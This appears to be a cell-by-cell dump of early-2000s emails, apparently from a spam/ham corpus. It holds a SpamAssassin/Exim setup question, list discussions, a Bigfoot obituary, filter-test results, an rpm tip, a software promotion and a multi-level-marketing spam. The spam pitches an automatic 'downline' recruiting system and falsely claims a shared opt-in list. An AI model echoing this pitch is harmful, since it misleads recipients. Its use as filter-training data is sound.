 Can someone enlighten me on why I get that? FreeBSD 4.6-STABLE, SA-2.3.0
 Secondly, I've tested (now on Three boxes) SA for site-wide usage but I believe I am
 missing something major because I've also had my setting checked/verified.
 The problem is that the site-wide setup does NOT seem to work. Why?
 1. I have my local.cf in /etc/mail/spamassassin
 2. I have spamd running, and mail delivery logs show that all e-mails are
    being passed thro SA.
 My local.cf contains:
 ENABLED=1
 OPTIONS="-F 0"
 #
 rewrite_subject         0
 report_header           1  
 defang_mime             0
 required_hits           7.0
 report_header           1
 use_terse_report        1
 subject_tag             **SPAM**
 wash ('tty') ~ 337 -&gt; exim -bt engingwarez@runjiri.co.ke
 eng.ngware@runji.co.ke
   deliver to enginngware in domain runjiri.co.ke
   director = spamcheck_director, transport = spamcheck
 However when I check the mail delivered to this mailbox, SA has _not_ added any headers
 to it.
 PERTINENT: I also run a Virus Scanner called DRWEB via Exim's system filter and the rules
 that I have applied are:
 if not first_delivery or
     $received_protocol is "drweb-scanned" or
     $received_protocol is "spam-scanned"
 then
   finish
 endif
 Some enlightenment would bail me out, I believe.
 Thanks
 -Wash
 -- 
 Odhiambo Washington  &lt;wash@wananchi.com&gt;    "The box said 'Requires
 Wananchi Online Ltd.  www.wananchi.com      Windows 95, NT, or better,'
 Tel: 254 2 313985-9   Fax: 254 2 313922     so I installed FreeBSD."   
 GSM: 254 72 743 223   GSM: 254 733 744 121  This sig is McQ!  :-)
 "We demand rigidly defined areas of doubt and uncertainty!"
 		-- Vroomfondel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</si>
  <si>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Re: One scam to rule them all..
</t>
  </si>
  <si>
    <t xml:space="preserve">What confuses me is, because these "scam" artists are laying out all
 the contact information right out on the table, why don't the police
 simply pose as recipients of the scam email and trap them?  I mean,
 I get no less than a half dozen a day and they should be real easy
 to corner.
 The only answer must be that the authorities in the countries in
 question must be in on the scam, but isn't international fraud (and
 kidnapping and murder if the reports I've seen on the media are true)
 isn't this an Interpol thing?
 I mean, the perpetrators are not exactly hiding, are they?
 What I really don't understand is why I keep getting more of these.
 Don't they know by now that I already made my millions on the first one?
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Read the article.  I'm afraid I don't understand how the transmission
 prices could have hit $50/tcf.
 But I'm also really leery of telling a pipeline company they have to run
 a pipeline at a higher pressure and that they should forego maintenance.
 We had a big pipeline explosion up here awhile ago.
 So maybe the judge has a point.  We'll see as the appeals work its way
 out.
 &gt; -----Original Message-----
 &gt; From: Geege Schuman [mailto:geege@barrera.org]
 &gt; Sent: Tuesday, September 24, 2002 5:16 AM
 &gt; To: johnhall@evergo.net
 &gt; Subject: RE: liberal defnitions
 &gt; 
 &gt; from slate's "today's papers":  The New York Times and Los Angeles
 Times
 &gt; both lead with word that
 &gt; a federal judge ruled yesterday that the nation's largest
 &gt; national gas pipeline company, El Paso, illegally withheld gas
 &gt; from the market during California's energy squeeze in 2000-01.
 &gt; The judge concluded that El Paso left 21 percent of its capacity
 &gt; in the state off-line, thus driving up the price of gas and
 &gt; helping to induce rolling blackouts.
 &gt; 
 &gt; and this is the product of overregulation?
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 John
 &gt; Hall
 &gt; Sent: Monday, September 23, 2002 11:57 PM
 &gt; To: FoRK
 &gt; Subject: liberal defnitions
 &gt; 
 &gt; 
 &gt; Depends on how much over spending vs. how much (and what type) over
 &gt; regulation.
 &gt; 
 &gt; The biggest problem with over regulation is the costs can be
 invisible.
 &gt; It also has the ability to single out particular people, while over
 &gt; spending spreads the damage more evenly.  Rent control would be an
 &gt; example of a regulation solution that is in general worse than
 spending
 &gt; tons of money on public housing.
 &gt; 
 &gt; As for the definition of a liberal being someone who seeks to impose
 &gt; both, I find no fault in that definition whatsoever.  The opinion that
 &gt; EITHER we are spending too much OR we have too much regulation is
 pretty
 &gt; much anathema to liberal politics.
 &gt; 
 &gt; Finally, those who argue that there are private replacements for much
 &gt; government regulation are not saying that a state of nature (no
 private
 &gt; replacements, no government regulation) is better than government
 &gt; regulation itself.
 &gt; 
 &gt; And in my experience people who label themselves 'Green' (which does
 not
 &gt; include everyone who loves trees and thinks smokestacks are ugly) is a
 &gt; watermelon.
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; &gt; -----Original Message-----
 &gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Geege
 &gt; &gt; Schuman
 &gt; &gt;
 &gt; &gt; funny. i read it as green = red, as in accounting, as in fiscally
 &gt; &gt; irresponsible.  which do you think is the worse indictment -
 &gt; &gt; overregulation
 &gt; &gt; or overspending?  there are many (dickheads) who buy into the
 &gt; &gt; neo-conservative media's (fox's) definiton of "liberal" as "one who
 &gt; seeks
 &gt; &gt; to
 &gt; &gt; impose both."
 &gt; 
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-07-23 at 19:00, Karl Anderson wrote:
 &gt; Dave Long &lt;dl@silcom.com&gt; writes:
 &gt; 
 &gt; &gt; &gt; It also strikes me that it will not be very long before livestock is
 &gt; &gt; &gt; genetically engineered to be dumber and meatier, and better adapted to
 &gt; &gt; &gt; living in industrial conditions.
 &gt; &gt; 
 &gt; &gt; If we're willing to count artificial
 &gt; &gt; selection as genetic engineering, it
 &gt; &gt; has been happening since pre-literate
 &gt; &gt; times, and is called "domestication".
 &gt; 
 &gt; But we're not willing to count it, I hope, since it isn't, any more
 &gt; than natural selection is genetic engineering.
 It's quite a bit more than natural selection; the times had a
 fascinating article a few months back (possibly posted as bits here)
 that note that one Holstein bull who died in the 70s is paternally
 related to something like 40% of the world's cattle. That's way, way
 more than natural selection, and (given the difficulty and expense of
 isolating specific genes for size, industrial-living-ness, etc.) more
 expansive than raw gene manipulation will be for some time.
 Luis
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: That wacky imam
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "Martin Adamson" &lt;martin@s...&gt; wrote:
 &gt; For an alternative, and rather more factually based, rundown on 
 Hamza's 
 &gt; career, including his belief that all non Muslims in Yemen should 
 be murdered 
 &gt; outright:
 &gt; 
 &gt; http://memri.org/bin/articles.cgi?Page=archives&amp;Area=ia&amp;ID=IA7201
 And we know how unbiased MEMRI is, don't we....
 http://www.guardian.co.uk/elsewhere/journalist/story/0,7792,773258,00.
 html
 Rob
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Ray Wallace (1919-2002)
</t>
  </si>
  <si>
    <t xml:space="preserve">Raymond L. Wallace, 83
 Bigfoot Story Teller
 (1919-2002)
 Ray Wallace, a controversial figure involved in 44 years of Bigfoot-related
 events, died November 26, 2002, in Toledo, Washington.  The Washington State
 construction tycoon had been ill for some time, living in a Toledo rest
 home.
 It was at Bluff Creek, California, in 1958, which found Ray Wallaces
 company building a new road through the northern California forest.   In
 August through October, Wallace Construction Company's employee Jerry Crew
 found tracks of a huge humanlike foot.  Thanks to instructions from
 taxidermist Bob Titmus, Crew made the first plaster casts of a footprint
 from this hairy upright creature his fellow workers called Bigfoot.  Crew
 took the cast to town, to quiet local ridicule, and showed it to a Humboldt
 County newspaper editor.  The photograph of Jerry Crew with the giant
 plaster of Paris foot imprint went out over the newswires.   It produced a
 revolutionary shift from small regional stories of Sasquatch to todays
 global awareness of Bigfoot. Soon after the publicized Crew finds, Wallace
 and his brother claimed other Bigfoot activity around the construction site;
 Wallace said he found tracks and droppings of Bigfoot.
 Wallace was to be involved with the local tales of hairy giants for the rest
 of his life.  Allegedly in the later in the 1950s, for example, Wallace
 offered to sell Texas millionaire Tom Slick a captured Bigfoot.  Wallace
 failed to produce the creature when Slick came up with an offer. Down
 through the years, Wallace would carry on pranks, be tied to carved fake
 Sasquatch feet, and produce and try to sell dubious photographs and films.
 He was a great letter writer and would pen long passages to magazine editors
 about this photographs or telling of how he knew a Bigfoot was nearby
 guarding a mine full of gold.  After awhile, most Bigfoot hunters and
 researchers took Wallace as merely a spinner of fanciful tall tales. Through
 his contributions to Strange Magazine, the Track Record, and indirectly to
 Fate Magazine, Wallace relished keeping his name in the limelight of the
 Bigfoot mystery.
 In March 1998, Ray Wallace offered a million dollars to the first person who
 could bring him a live baby Bigfoot.  Saying he had tracked Bigfoot for
 forty years, Wallace claimed he wanted to raise a young Sasquatch to
 adulthood. Wallace told reporters he planned to raise a baby Bigfoot with
 care and respect and would like to train the creature to ride around with
 him in his pickup truck and help out with chores around his ranch.  No one
 came forth with a baby Bigfoot.
 Ray Wallace added an intriguing, mostly harmless story-telling element to
 the otherwise often serious pursuit of Bigfoot that various friends of his,
 such as Ray Crowe, Director of the International Bigfoot Society, enjoyed.
 Ray Wallace was interred at the Lone Hill Cemetery in Toledo, Washington
 State, on November 30, 2002.
 Loren Coleman 2002
 http://www.lorencoleman.com
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; They weren't partitioned in any particular scheme - I think I'll write a
 &gt; reshuffler and move them all around, just in case (fwiw, I'm using MH 
 &gt; style folders with numbered files - means you can just use MH tools to 
 &gt; manipulate the sets.)
 Freak show. Obviously there _was_ some sort of patterns to the data:
 Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 1798 hams &amp; 1546 spams
       0.779   0.582
       0.834   0.840
       0.945   0.452
       0.667   1.164
 Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 1798 hams &amp; 1547 spams
       1.112   0.776
       0.834   0.969
       0.779   0.646
       0.667   1.100
 Training on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 1798 hams &amp; 1548 spams
       1.168   0.582
       1.001   0.646
       0.834   0.582
       0.667   0.453
 Training on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 1798 hams &amp; 1547 spams
       0.779   0.712
       0.779   0.582
       0.556   0.840
       0.779   0.970
 Training on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 1798 hams &amp; 1546 spams
       0.612   0.517
       0.779   0.517
       0.723   0.711
       0.667   0.582
 total false pos 144 1.60177975528
 total false neg 101 1.30592190328
 (before the shuffle, I was seeing:
 total false pos 273 3.03501945525
 total false neg 367 4.74282760403
 )
 For sake of comparision, here's what I see for partitioned into 2 sets:
 Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 4492 hams &amp; 3872 spams
       0.490   0.776
 Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 4493 hams &amp; 3868 spams
       0.401   0.491
 total false pos 40 0.445186421814
 total false neg 49 0.633074935401
 more later...
 Anthony
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Working for the Mouse
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85541049
 Date: Not supplied
 Berkeley's Impact Theatre is running a one-man show called "Working for the 
 Mouse," which details one man's experiences working at Disneyland. The story of 
 the show's poster[1] is pretty funny, too. Link[2] Discuss[3] (_Thanks, Barry!_
 )
 [1] http://www.cheshiredave.com/mastication/2002/10/0041-mouse.html
 [2] http://www.impacttheatre.com/season/index.html
 [3] http://www.quicktopic.com/boing/H/qmXnPYTBGj3A
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This one will make you money  9/20/02 11:34:52 PM
</t>
  </si>
  <si>
    <t xml:space="preserve">A great sponsor will not make you money.
 A great product line will not make you money either.
 A great compensation plan will not make you money either.
 A great company will not make you money either.
 Some say it's a combination of the above.
 Some say it's what's inside you that matters the most.
 Forget about meetings, one-on-one, 3-ways calls, etc.
 Those old ways of network marketing has come and gone.
 They wear you out long before you make any money.
 What makes you money is a downline associated with a
 stable company that has consumable products.
 Where's the downline coming from?  Well, we have an
 online automatic recruiting system that does the work
 for you.  Our system will place paying members in 
 your downline.
 Furthermore, you can see it working first hand before
 you decide what to do, if any.
 &lt;html&gt;
 &lt;a href="mailto:money2002@subdimension.com?subject=send-more-info"&lt;b&gt;
 For more info on this simple but powerful recruiting system 
 please click here and send a blank message&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="mailto:optinlist@subdimension.com?subject=REMOVE"&lt;b&gt;
 We belong to the same opt-in list. But if you wish to have your email
 address REMOVE from our database please click here&lt;/b&gt;&lt;/a&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The Wrong Business
</t>
  </si>
  <si>
    <t xml:space="preserve">
 egad ... you mean there's two of them???  I knew there was a reason
 my jobs board had jumped to the top of my traffic list.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CuteFTP exclusive: OmniPage Pro with DNS
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format. If you can see this
 message, perhaps your mail reader doesn't support MIME. You should
 still be able to see the text version of the e-mail message, which
 follows below.
 Unsubscribe: http://www.digitalriver.com/v2.0-bin/ecm/opt-out?uid=mhp6bz6bz0pebbrn6
 --------------06986E0E1E196312E032AFBC
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Say goodbye to paper.
 Dear GlobalSCAPE Customer,
 GlobalSCAPE has partnered with ScanSoft to offer you the latest
 version of OmniPage Pro, for just $99.99* - the regular list price
 is $499! The most common question we've received about this offer
 is - Is this genuine? We would like to assure you that this offer
 is authorized by ScanSoft, is genuine and valid. You can get the
 FULL VERSION of OmniPage Pro 12 for $99.99. No previous
 installation of OmniPage is necessary. For more information or to
 order your copy click here but you must act now, this offer expires
 on December 13, 2002!
 http://www.digitalriver.com/promo=581
 Convert physical into digital with OmniPage
 Throw away your file cabinet and convert all your papers into
 Microsoft Office and PDF documents, which you can easily archive
 and edit. Turn contracts, invoices, manuals and proposals into Word
 and Excel documents.  Archive your important papers and finally
 organize and find the information you need hassle-free. No more
 paper shuffling or time wasted retyping and reformatting.
 Essential companion to Microsoft Office
 OmniPage is easy to use. Simply scan in your papers and OmniPage
 will convert text, retain layouts, tables and graphics. And since
 you simply use Microsoft Word or Excel to edit your document, there
 are no new complicated programs to learn.
 Turn PDF files into documents you can edit!
 Turn "read-only" PDF files into Microsoft Word and Excel documents
 you can edit. Or convert paper into PDF files that generate crisp,
 clear documents that virtually any computer can view.
 IMPROVE YOUR PRODUCTIVITY for just $99.99!
 Omnipage Pro 12 is the most accurate OCR software on the market.
 Save time and money and order Omnipage Pro NOW. For more
 information, or to order your copy, click here.
 http://www.digitalriver.com/promo=581
 Please note, this offer expires on December 13, 2002 and is only
 available in the U.S. and Canada.
 We look forward to hearing from you.
 Thank You,
 Sandra Poole-Christal
 President &amp; COO
 GlobalSCAPE, Inc.
 -----------------------------------------------------------------------------------------
 A BRIEF INTRODUCTION TO YOUR FREE GIFT:
 Use your voice to create documents, control applications and use
 the PC. Dragon NaturallySpeaking6 Essentials is the affordable
 introduction to speech recognition. It lets you browse, search, and
 scroll up and down Web pages simply by speaking Web addresses and
 links. You can send Instant Messages and chat online as fast as you
 speak, create e-mail, and surf the Web, all by voice! Its fast,
 fun, accurate, and easy to use. (A noise-canceling microphone is
 included.)
 Dragon NaturallySpeaking6 Essentials has a value of $59.99, but is
 yours FREE when you order OmniPage Pro 12 before December 13, 2002!
 To order, click here.
 http://www.digitalriver.com/promo=581
 -----------------------------------------------------------------------------------------
 Unsubscribe instructions
 If you do not wish to receive announcements from GlobalSCAPE via
 e-mail, please click the remove link and accept our apologies for
 any inconvenience:
 http://www.digitalriver.com/v2.0-bin/ecm/opt-out?uid=mhp6bz6bz0pebbrn6
 2002 GlobalSCAPE, Inc. - http://www.globalscape.com
 --------------06986E0E1E196312E032AFBC
 Content-Type: text/html; charset=us-ascii
 Content-Disposition: inline
  &lt;HTML&gt;
  &lt;HEAD&gt;
  &lt;TITLE&gt;&lt;/TITLE&gt;
  &lt;/HEAD&gt;
  &lt;BODY text="#000000" vLink="#000000" link="#000000" bgColor="#ffffff"&gt;
  &lt;table cellSpacing="0" cellPadding="0" width="633" border="0"&gt;
  &lt;tr&gt;
  &lt;td vAlign="top" colSpan="3"&gt;&lt;IMG src="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/whiteheader3.gif"&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;TD width="15" background="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/whiteleft.gif" rowSpan="3"&gt;&amp;nbsp;&lt;/TD&gt;
  &lt;td width="603"&gt;&lt;br&gt;
  &lt;a href="http://www.digitalriver.com/dr/v2/ec_MAIN.Entry17c?SP=10007&amp;PN=5&amp;CID=65797&amp;SID=19198&amp;PID=478610"&gt;&lt;img src="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/scansoftheading2.gif" border="0"&gt;&lt;/a&gt;&lt;br&gt;
  &lt;HR align="center" color="#cccccc" noShade&gt;
  &lt;center&gt;&lt;FONT face="verdana" size="3"&gt;&lt;b&gt;Say goodbye to paper.&lt;/b&gt;&lt;/FONT&gt;&lt;/center&gt;
  &lt;HR align="center" color="#cccccc" noShade&gt;
  &lt;/td&gt;
  &lt;TD width="15" background="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/whiteright.gif" rowSpan="3"&gt;&amp;nbsp;&lt;/TD&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td vAlign="top"&gt;
  &lt;TABLE id="Table1" cellSpacing="0" cellPadding="10" width="603" border="0"&gt;
  &lt;tr&gt;
  &lt;td&gt;&lt;/FONT&gt;
  &lt;table id="Table2" cellSpacing="0" cellPadding="0" width="580" border="0"&gt;
  &lt;tr&gt;
  &lt;td&gt;
  &lt;P align="justify"&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;A href="http://www.digitalriver.com/dr/v2/ec_MAIN.Entry17c?SP=10007&amp;PN=5&amp;CID=63618&amp;SID=19198&amp;PID=451188"&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
  &lt;P align="justify"&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;/FONT&gt;&lt;/P&gt;
  &lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
  &lt;P&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;Dear GlobalSCAPE
  Customer,&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;&lt;BR&gt;&lt;BR&gt;GlobalSCAPE has partnered with ScanSoft
  to offer you the latest version of &lt;/SPAN&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: #3366cc; FONT-FAMILY: Verdana"&gt;OmniPage Pro, for just
  $99.99*&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt; - &lt;B&gt;the regular list price is $499!&lt;/B&gt; The most common question we've
  received about this offer is - &lt;B&gt;Is this genuine? &lt;/B&gt;We would like to assure you that this offer is
  authorized by ScanSoft, is genuine and valid. You can get the
  &lt;I&gt;FULL VERSION &lt;/I&gt;of OmniPage Pro 12
  for $99.99. No previous installation of OmniPage is necessary.
  For more information or to order your copy &lt;A href="http://www.digitalriver.com/dr/v2/ec_MAIN.Entry17c?SP=10007&amp;PN=5&amp;CID=65797&amp;SID=19198&amp;PID=478610"&gt;
  click here but you must act now!&lt;/A&gt;&lt;/SPAN&gt;&lt;/P&gt;
  &lt;P&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: #3366cc; FONT-FAMILY: Verdana"&gt;Convert physical into digital with
  OmniPage&lt;BR&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;Throw away your file cabinet and convert
  all your papers into Microsoft Office and PDF documents, which
  you can easily archive and edit. Turn contracts, invoices,
  manuals and proposals into Word and Excel documents.&lt;SPAN style="mso-spacerun: yes"&gt;&amp;nbsp;
  &lt;/SPAN&gt;Archive your important papers and finally organize and
  find the information you need hassle-free. No more paper
  shuffling or time wasted retyping and reformatting.&lt;/SPAN&gt;&lt;/P&gt;
  &lt;P&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: #3366cc; FONT-FAMILY: Verdana"&gt;Essential companion to Microsoft
  Office&lt;BR&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;OmniPage is easy to use. Simply scan in
  your papers and OmniPage will convert text, retain layouts,
  tables and graphics. And since you simply use Microsoft Word
  or Excel to edit your document, there are no new complicated
  programs to learn.&lt;/SPAN&gt;&lt;/P&gt;
  &lt;P&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: #3366cc; FONT-FAMILY: Verdana"&gt;Turn PDF files into documents you can
  edit!&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana"&gt;&lt;BR&gt;Turn "read-only"
  PDF files into Microsoft Word and Excel documents you can
  edit. Or convert paper into PDF files that generate crisp,
  clear documents that virtually any computer can view.
  &lt;/SPAN&gt;&lt;/P&gt;
  &lt;P align="justify"&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: #3366cc; FONT-FAMILY: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;IMPROVE YOUR PRODUCTIVITY for just
  $99.99&lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 12pt; COLOR: #3366cc; FONT-FAMILY: 'Times New Roman'; mso-fareast-font-family: 'Times New Roman'; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;!&lt;BR&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Verdana; mso-fareast-font-family: 'Times New Roman'; mso-bidi-font-family: 'Times New Roman'; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;Omnipage Pro 12 is the most accurate OCR
  software on the market. Save time and money and order Omnipage
  Pro NOW. For more information, or to order your copy, &lt;A href="http://www.digitalriver.com/dr/v2/ec_MAIN.Entry17c?SP=10007&amp;PN=5&amp;CID=65797&amp;SID=19198&amp;PID=478610"&gt;click
  here.&lt;/A&gt;&lt;/SPAN&gt;
  &lt;/FONT&gt;&lt;/P&gt;
  &lt;P align="justify"&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Please
  note,&amp;nbsp;this offer&amp;nbsp;expires on &lt;b&gt;December 13, 2002 &lt;/b&gt;and is only available in the U.S. and Canada.&lt;BR&gt;
  &lt;BR&gt;
  We look forward to hearing from you.&lt;BR&gt;
  &lt;/FONT&gt;
  &lt;/P&gt;
  &lt;P align="left"&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Thank You,&lt;BR&gt;
  &lt;img src="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/sandysignature.gif" vspace="5"&gt;&lt;br&gt;
  Sandra Poole-Christal&lt;BR&gt;
  President &amp; COO&lt;BR&gt;
  GlobalSCAPE, Inc. &lt;/FONT&gt;
  &lt;/P&gt;
  &lt;/td&gt;
  &lt;td vAlign="top" width="150"&gt;
  &lt;IMG src="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/freegift_bar.gif" vspace="10"&gt;&lt;BR&gt;
  &lt;img src="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/dns_box_small.gif" vspace="5"&gt;&lt;br&gt;
  &lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dragon Naturally
  speaking essentials has a value of $59.99 but is yours &lt;b&gt;FREE&lt;/b&gt; when you
  order OmniPage Pro 12 before &lt;b&gt;December 13, 2002.&lt;/b&gt; &lt;/FONT&gt;
  &lt;/td&gt;
  &lt;/tr&gt;
  &lt;/table&gt;
  &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td&gt;
  &lt;P&gt;&lt;/P&gt;
  &lt;P&gt;
  &lt;HR align="center" color="#cccccc" noShade&gt;
  &lt;FONT face="Verdana"&gt;&lt;FONT size="2"&gt;&lt;STRONG&gt;&lt;FONT color="#3366cc"&gt;A Brief Introduction to Your
  Free Gift:&lt;BR&gt;&lt;br&gt;
  &lt;/FONT&gt;&lt;/STRONG&gt;&lt;IMG alt="" src="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/dns_box.gif" align="left" vspace="20"&gt;Use
  your voice to create documents, control applications and use the PC. Dragon
  NaturallySpeaking&amp;#174;6 Essentials is the affordable introduction to speech
  recognition. It lets you browse, search, and scroll up and down Web pages
  simply by speaking Web addresses and links. You can send Instant Messages and
  chat online as fast as you speak, create e-mail, and surf the Web &amp;#8212; all by
  voice! Its fast, fun, accurate, and easy to use. (A noise-canceling microphone
  is included.) &lt;/FONT&gt;&lt;/FONT&gt;
  &lt;/P&gt;
  &lt;P&gt;&lt;FONT face="Verdana" size="2"&gt;Dragon NaturallySpeaking&amp;#174;6 Essentials has a value of
  $59.99, but is yours FREE when you order OmniPage Pro 12 before &lt;b&gt;December 13,
  2002!&lt;/b&gt; To order, click here.&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
  &lt;P&gt;
  &lt;HR align="center" color="#cccccc" noShade&gt;
  &lt;/P&gt;
  &lt;P&gt;&lt;/P&gt;
  &lt;p&gt;&lt;/p&gt;
  &lt;font face="verdana,arial,helvetica"&gt;&lt;font style="FONT-SIZE: 6.5pt"&gt;&lt;b&gt;Unsubscribe
  instructions&lt;/b&gt;&lt;br&gt;
  If you do not wish to receive announcements from GlobalSCAPE via e- mail,
  please click the remove link and accept our apologies for any inconvenience: &lt;a href="http://www.digitalriver.com/v2.0-bin/ecm/opt-out?uid=mhp6bz6bz0pebbrn6"&gt;
  Remove Me&lt;/a&gt;
  &lt;br&gt;
  &lt;/a&gt;&lt;/font&gt;&lt;/font&gt;
  &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td colspan="2"&gt;&lt;font face="verdana,arial,helvetica"&gt;&lt;font style="FONT-SIZE: 6.5pt"&gt;&amp;copy;2002 &lt;A href="http://www.globalscape.com"&gt;
  GlobalSCAPE, Inc.&lt;/A&gt; &lt;A href="http://www.globalscape.com/company/privacy.shtml"&gt;
  Privacy Policy&lt;/A&gt; &lt;A href="http://www.globalscape.com/company/trademarks.shtml"&gt;
  Trademarks&lt;/A&gt;&lt;BR&gt;
  &lt;br&gt;
  Microsoft, Windows, and the Windows logo are trademarks, or registered
  trademarks of Microsoft Corporation in the United States and/or other
  countries. &lt;/font&gt;&lt;/font&gt;
  &lt;/td&gt;
  &lt;/tr&gt;
  &lt;/TABLE&gt;
  &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
  &lt;td vAlign="top" colSpan="3"&gt;&lt;a href="http://www.globalscape.com"&gt; &lt;IMG src="http://a248.e.akamai.net/f/248/5462/2h/www.digitalriver.com/htmlemails/globalscape/111802/whitefooter.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
  &lt;/tr&gt;
  &lt;/table&gt;
  &lt;/body&gt;
 &lt;/html&gt;
 --------------06986E0E1E196312E032AFBC--
 -- End --
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.
 "Kevin Worthington" &lt;kworthington@linuxmail.org&gt; wrote:
 &gt; into /home/dude/redhat etc. by running
 &gt; #rpm -ivh foo.src.rpm
 Do this:
 echo "%_topdir /home/dude/redhat" &gt;&gt; /home/dude/.rpmmacros
 and make sure the directory structure (RPMS, SOURCES, SPECS, SRPMS, BUILD)
 is there.
 -- 
 R!
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 04 Oct 2002 16:07:12 -0700
 Ben Liblit &lt;liblit@eecs.berkeley.edu&gt; wrote:
